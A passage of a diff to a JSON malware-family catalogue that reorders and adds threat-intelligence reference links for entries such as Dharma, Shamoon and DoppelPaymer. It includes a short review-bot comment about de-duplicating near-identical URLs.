@@ -21678,37 +22715,44 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", - "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.acronis.com/en-us/articles/Dharma-ransomware/", - "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + 
"https://research.checkpoint.com/2018/the-ransomware-doctor-without-a-cure/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://securelist.com/cis-ransomware/104452/", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://asec.ahnlab.com/en/54937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://www.acronis.com/en-us/articles/Dharma-ransomware/", + "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", + "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://twitter.com/JakubKroustek/status/1087808550309675009", + "https://s3.documentcloud.org/documents/6986753/Secret-Service-Seattle-NIT-Warrant-Application.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + 
"https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "http://web.archive.org/web/20191008053714/http://esec-lab.sogeti.com/posts/2016/06/07/the-story-of-yet-another-ransomfailware.html", + "https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/", + "https://www.vice.com/en/article/wxqz54/secret-service-network-investigative-technique-ransomware", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.group-ib.com/media/iran-cybercriminals/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://twitter.com/JakubKroustek/status/1087808550309675009", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/" + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.justice.gov/usao-dc/press-release/file/1021186/download", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.theregister.com/2019/11/11/dharma_decryption_promises_data_recovery/", + 
"https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", + "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/" ], "synonyms": [ "Arena", @@ -21726,14 +22770,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", - "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", - "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced", - "https://blog.cylance.com/a-study-in-bots-diamondfox", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://www.scmagazine.com/inside-diamondfox/article/578478/", - "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF" + "https://blog.cylance.com/a-study-in-bots-diamondfox" ], "synonyms": [ "Crystal", 
@@ -21750,20 +22794,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol", - "https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648", - "https://arcticwolf.com/resources/blog/karakurt-web", - "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/", - "https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/", "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider", - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/", + "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday", + "https://arcticwolf.com/resources/blog/karakurt-web", + "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/", "https://medium.com/walmartglobaltech/diavol-resurfaces-91dd93c7d922", "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", - "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday", "https://www.ic3.gov/Media/News/2022/220120.pdf", - "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/", - "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/", - "https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/" + "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/", + "https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/", + "https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + 
"https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/", + "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/", + "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/" ], "synonyms": [], "type": [] @@ -21842,12 +22886,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe", + "https://decoded.avast.io/martinchlumecky/dirtymoe-5/", + "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/", "https://decoded.avast.io/martinchlumecky/dirtymoe-4/", "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html", "https://decoded.avast.io/martinchlumecky/dirtymoe-3/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-5/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-1/", - "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/" + "https://decoded.avast.io/martinchlumecky/dirtymoe-1/" ], "synonyms": [], "type": [] 
@@ -21887,30 +22931,30 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
- "https://malwareindepth.com/shamoon-2012/",
- "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
- "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
- "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
- "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
  "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
- "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
+ "https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
+ "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
  "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
+ "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://malwareindepth.com/shamoon-2012/",
+ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
+ "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
  ],
  "synonyms": [
  "Shamoon"
@@ -21926,10 +22970,10 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent",
  "https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf",
- "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/",
  "https://blog.talosintelligence.com/2019/09/divergent-analysis.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/",
  "https://www.cert-pa.it/notizie/devergent-malware-fileless/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/"
+ "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/"
  ],
  "synonyms": [
  "Novter"
@@ -21972,6 +23016,7 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff",
+ "https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d",
  "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/"
  ],
  "synonyms": [],
@@ -21981,7 +23026,7 @@
  "value": "DMSniff"
  },
  {
- "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.",
+ "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy",
@@ -22011,12 +23056,12 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
  "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
  "https://blog.talosintelligence.com/2017/03/dnsmessenger.html",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/"
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/"
  ],
  "synonyms": [
  "TEXTMATE"
@@ -22032,18 +23077,21 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage",
  "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
- "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
  "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
- "https://www.us-cert.gov/ncas/alerts/AA19-024A",
  "https://marcoramilli.com/2019/04/23/apt34-webmask-project/",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
- "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
+ "https://www.us-cert.gov/ncas/alerts/AA19-024A",
  "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf",
+ "https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale",
+ "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
+ "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
+ "https://www.youtube.com/watch?v=ws1k44ZhJ3g",
+ "https://nsfocusglobal.com/apt34-event-analysis-report/",
  "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
- "https://nsfocusglobal.com/apt34-event-analysis-report/"
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
  ],
  "synonyms": [
  "Agent Drable",
@@ -22088,8 +23136,8 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino",
- "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/",
- "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/"
  ],
  "synonyms": [],
  "type": []
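Review bot: The two `securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor` refs in the Minodo (win.domino) hunk differ only by a trailing slash, and the hunk merely swaps their order instead of collapsing them into one entry. The same near-duplicate pattern survives on the new side of the DoppelPaymer hunk (`double-trouble-ransomware-data-leak-extortion-part-1` with and without `/`, `secureworks.com/research/threat-profiles/gold-heron` over both `http` and `https`) and of the DoubleZero hunk (`overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` with and without `/`). If this file is produced by a generator, the fix belongs there: normalise each ref (strip the trailing slash, lower-case scheme and host) before de-duplicating, keeping the first occurrence, so consumers that key on the ref string do not count the same source twice. The `},` closing each of these objects lies outside the hunk.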
@@ -22097,13 +23145,27 @@
  "uuid": "37169b2f-344e-4913-ab91-d447d597ffa7",
  "value": "Minodo"
  },
+ {
+ "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot",
+ "https://labs.k7computing.com/index.php/the-donot-apt/",
+ "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc",
+ "value": "DONOT"
+ },
  {
  "description": "Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42).\r\nGithub: https://github.com/TheWover/donut",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector",
- "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
  "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
  "https://thewover.github.io/Introducing-Donut/"
  ],
  "synonyms": [
@@ -22119,9 +23181,10 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns",
+ "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf",
  "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/",
- "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
- "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
+ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry"
  ],
  "synonyms": [],
  "type": []
@@ -22134,20 +23197,20 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex",
- "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
- "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
  "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://redcanary.com/blog/grief-ransomware/",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
- "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
  "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
+ "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
  "https://cyber-anubis.github.io/malware%20analysis/dridex/",
+ "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
+ "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
  "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware"
  ],
  "synonyms": [],
@@ -22161,65 +23224,65 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
+ "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
  "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
- "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
  "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
  "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://twitter.com/vikas891/status/1385306823662587905",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
  "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/",
